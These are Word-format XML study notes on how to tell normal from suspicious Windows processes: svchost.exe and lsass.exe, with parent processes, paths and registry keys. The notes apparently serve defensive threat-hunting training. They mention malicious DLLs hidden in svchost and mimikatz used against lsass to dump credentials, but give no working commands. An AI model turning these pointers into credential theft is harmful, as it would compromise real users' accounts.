      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBA96C" w14:textId="7428E0FE" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4C5A5F" w14:textId="6FDA66B1" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: within seconds of boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A27735" w14:textId="46DCEF6F" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DA3ED5" w14:textId="071DA815" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent process other than wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5EDFF" w14:textId="770303EC" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image file path other than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA734A" w14:textId="273F13DB" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Subtle misspellings hiding rogue processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E9722E" w14:textId="61DF787D" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Multiple running instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E3C02" w14:textId="02FCB993" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Not running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3467EED5" w14:textId="12E586ED" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WININIT.EXE &gt; SERVICES.EXE &gt; SVCHOST.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A75DE4F" w14:textId="4F13E998" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F5448F" w14:textId="0615FDB7" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Host Process for Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2F81A" w14:textId="08B849FB" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hosts and manages Windows Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAD48A" w14:textId="0687C325" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Services running in this process are implemented as DLLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156141F" w14:textId="2E6188A9" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">stored in registry for service under Parameters subkey in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ServiceDLL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EC4850C" w14:textId="033ADB24" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\Services\SERVICE NAME\Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F5A622" w14:textId="420C72B7" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To view within Process Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D0021" w14:textId="71EFB860" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>right click svchost.exe process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14813F6D" w14:textId="4F3C9382" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Select Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F3B758" w14:textId="68DED189" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Look at Service DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47195C3F" w14:textId="526DBB43" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Key identifier in binary path “-k” – legitimate svchost.exe process calling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5DBB8" w14:textId="10FCB77C" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>groups similar services to share similar process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17C0C0" w14:textId="415D3941" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Machines with 3.5 GB of memory, Windows 10 Version 1703 allows individual services to run own processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A4B1B" w14:textId="754CCE7A" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>As svchost.exe has multiple running processes, it is a target for malicious attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9A1E3A" w14:textId="15C89393" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>hide malware amongst legit processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD234D6" w14:textId="3EDE2ADF" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>install malicious DLLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1F9011" w14:textId="6D76DE71" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04407F61" w14:textId="668DB727" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0"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System32\svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B84548" w14:textId="6A2A64FE" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77715B8E" w14:textId="791112B9" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: Many</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F083207" w14:textId="64883054" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Varies depending on svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B304BB" w14:textId="2AA079C0" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: Within seconds of boot or later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B7EA2" w14:textId="23AC2F06" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F94B49A" w14:textId="652BC004" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process other than services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A724CFE" w14:textId="383EC1F1" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image file path other than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA31DD4" w14:textId="7AEB6149" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Subtle misspellings to hide rogue processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33002FBF" w14:textId="09278815" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Absence of -k parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9C4094" w14:textId="783BF105" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LSASS.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A40F5" w14:textId="461A1546" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Local Security Authority Subsystem Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEED67" w14:textId="7E872473" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>responsible for enforcing security policy on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E57A0" w14:textId="62A0D0E6" w:rsidR="00310FB0" w:rsidRPr="0084205E" w:rsidRDefault="00310FB0" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>verifies users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B006A" w14:textId="030A01E9" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>handles password changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F7E7F1" w14:textId="77A7B104" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>creates access tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773ECB87" w14:textId="42B16E5C" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>writes to Windows Security Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3A0FB" w14:textId="4E70ACBB" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Creates security tokens for SAM, AD, and NETLOGON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F680F" w14:textId="2E24DDDD" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKLM\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57602FF7" w14:textId="37C7E4A1" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Also targeted by adversaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9ABF58" w14:textId="5ECDC1DF" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> used to dump credentials or mimic process to hide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16937DA7" w14:textId="774E610A" w:rsidR="00BF7196" w:rsidRPr="0084205E" w:rsidRDefault="00BF7196" w:rsidP="0084205E">
      <w:pPr>
